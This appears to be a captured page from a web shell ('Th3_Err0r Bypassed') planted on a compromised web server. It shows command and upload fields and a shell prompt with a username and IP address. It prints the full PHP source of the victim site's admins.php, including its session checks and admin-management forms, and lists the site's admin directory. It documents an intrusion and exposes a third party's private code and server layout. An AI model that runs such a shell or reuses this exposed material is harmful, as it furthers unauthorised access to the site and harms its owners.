[ Th3_Err0r Bypassed ]

Upload:

Command:

liwaavux@216.73.217.165: ~ $ 
<?php 
ob_start();
session_start();
?>
<?php
if(isset($_SESSION['user_liwwan_admin_2023930']) AND ($_SESSION['type'] == "manager_session_alliwan") ){
if($_SESSION['uid'] == 1 || $_SESSION['uid'] == 2){
    $pageTitle  = 'alliwan / Admins ';
    include 'init.php';
$stmt = $conn->prepare("SELECT * FROM royaladmin WHERE adminid != 1 && adminid != 2 ORDER BY adminid DESC ");

// Excute the ststment

$stmt->execute();

//Assign To varriable

$rows = $stmt->FetchAll();
/*if($rows['adminid'] != 1)  {
    header('Location:logout.php');
    exit;
}*/
?>
<section class="con-benfs">
    <h1 class="member-h1"> Admins </h1>
    <div class="container-fluid">
        <a href ="add_admin.php" class="btn-add fw-bold">+ New admin</a><br>
        <div class="table-responsive my-4">
            <table class="main-table text-center table table-bordered ">
                <tr>
                    <td>#ID</td>
                    <td>username</td>
                    <td>Full Name</td>
                    <td>status</td>
                    <td>Regesterd Date</td>
                    <td class="w-25">Control</td>
                </tr>
                    <?php
                        foreach ($rows as $row ) {
                        echo "<tr>";
                        echo "<td>" . $row ['adminid'] . "</td>"; 
                        echo "<td>" . $row ['username'] . "</td>";
                        echo "<td>" . $row ['fullname'] . "</td>";
                        echo "<td>";
                        if($row ['active'] == 0)  {echo "موقوف";
                        }elseif ($row ['active'] == 1 ) { echo "مفعل";}
                        echo "</td>";
                        echo "<td>" . $row ['adddate'] . "</td>";?>

                        <td>
                            <div class="row">
                                <div class="col-lg-4 col-sm-12 mt-1">
                                    <form action="ac_edit_admin.php" method="POST">
                                        <input type="hidden" name="ad_id" value="<?php echo $row ['adminid']; ?>">
                                        <button href="ac_edit_admin.php" type="submit" name="delete_admin" onclick="return confirm('متأكد من حذف المستخدم');" class="w-100 btn btn-danger fw-bold bg-none border-0">D</button>
                                    </form>
                                </div>
                                <div class="col-lg-4 col-sm-12 mt-1">
                                    <form action="ac_edit_admininfo.php" method="POST">
                                        <input type="hidden" name="ad_id" value="<?php echo $row ['adminid']; ?>">
                                        <button href="ac_edit_admininfo.php" type="submit" name="edit_admin" class="w-100 btn btn-info fw-bold bg-none border-0">ED</button>
                                    </form>
                                </div>
                                <?php if($row ['active'] == 0)  { ?>
                                <div class="col-lg-4 col-sm-12 mt-1">
                                    <form action="ac_edit_admin.php" method="POST">
                                        <input type="hidden" name="ad_id" value="<?php echo $row ['adminid']; ?>">
                                        <button href="ac_edit_admin.php" type="submit" name="active_admin" onclick="return confirm('متأكد من تفعيل حساب المستخدم');" class="w-100 btn btn-success fw-bold bg-none border-0">Act</button>
                                    </form>
                                </div>
                                <?php }?>
                                <?php if($row ['active'] == 1)  { ?>
                                <div class="col-lg-4 col-sm-12 mt-1">
                                    <form action="ac_edit_admin.php" method="POST">
                                        <input type="hidden" name="ad_id" value="<?php echo $row ['adminid']; ?>">
                                        <button href="ac_edit_admin.php" type="submit" name="pend_admin" onclick="return confirm('متأكد من إلغاء تفعيل حساب المستخدم');" class="w-100 btn btn-warning fw-bold bg-none border-0">Pend</button>
                                    </form>
                                </div>
                                <?php }?>
                            </div>
                        </td>
                    <?php } ?>
                </tr>
            </table>
        </div>

        <a href ="add_admin.php" class="btn-add fw-bold">+ New admin</a>

    </div>
</section>
<?php
include 'assets/includes/template/footer.php';
?>
<?php
}else{
    header('Location:index.php');
    exit;  
}
}else{
header('Location:index.php');
exit;
}
?>
<?php
ob_end_flush();

Filemanager

DIR : / home/ liwaavux/ public_html/ admin/
Name Type Size Permission Actions
assets Folder 0755
images Folder 0755
ac_citycalc.php File 15.27 KB 0644
ac_edit_admin.php File 2.67 KB 0644
ac_edit_admininfo.php File 4.36 KB 0644
ac_edit_imgs.php File 34.27 KB 0644
ac_edit_pr.php File 10.72 KB 0644
ac_projects.php File 5.24 KB 0644
ac_workshops.php File 18.62 KB 0644
add_admin.php File 4.32 KB 0644
add_customer_template.php File 11.1 KB 0644
add_project.php File 17.22 KB 0644
add_workshop.php File 5.15 KB 0644
admins.php File 4.81 KB 0644
citycalc.php File 5.01 KB 0644
cons_orders.php File 4.51 KB 0644
custommer_templates.php File 4.59 KB 0644
dashboard.php File 4.11 KB 0644
edit_cus_template.php File 11.74 KB 0644
editadminpassword.php File 5.17 KB 0644
error_log File 309.84 KB 0644
imgs.php File 18.17 KB 0644
index.php File 3.19 KB 0644
init.php File 183 B 0644
logout.php File 186 B 0644
newsletter.php File 3.13 KB 0644
projects.php File 13.89 KB 0644
projects_card.php File 13.29 KB 0644
show.php File 8.81 KB 0644
workshop_details.php File 12.08 KB 0644
workshops.php File 4.63 KB 0644

© 2026 Coded By Th3_Err0r Code.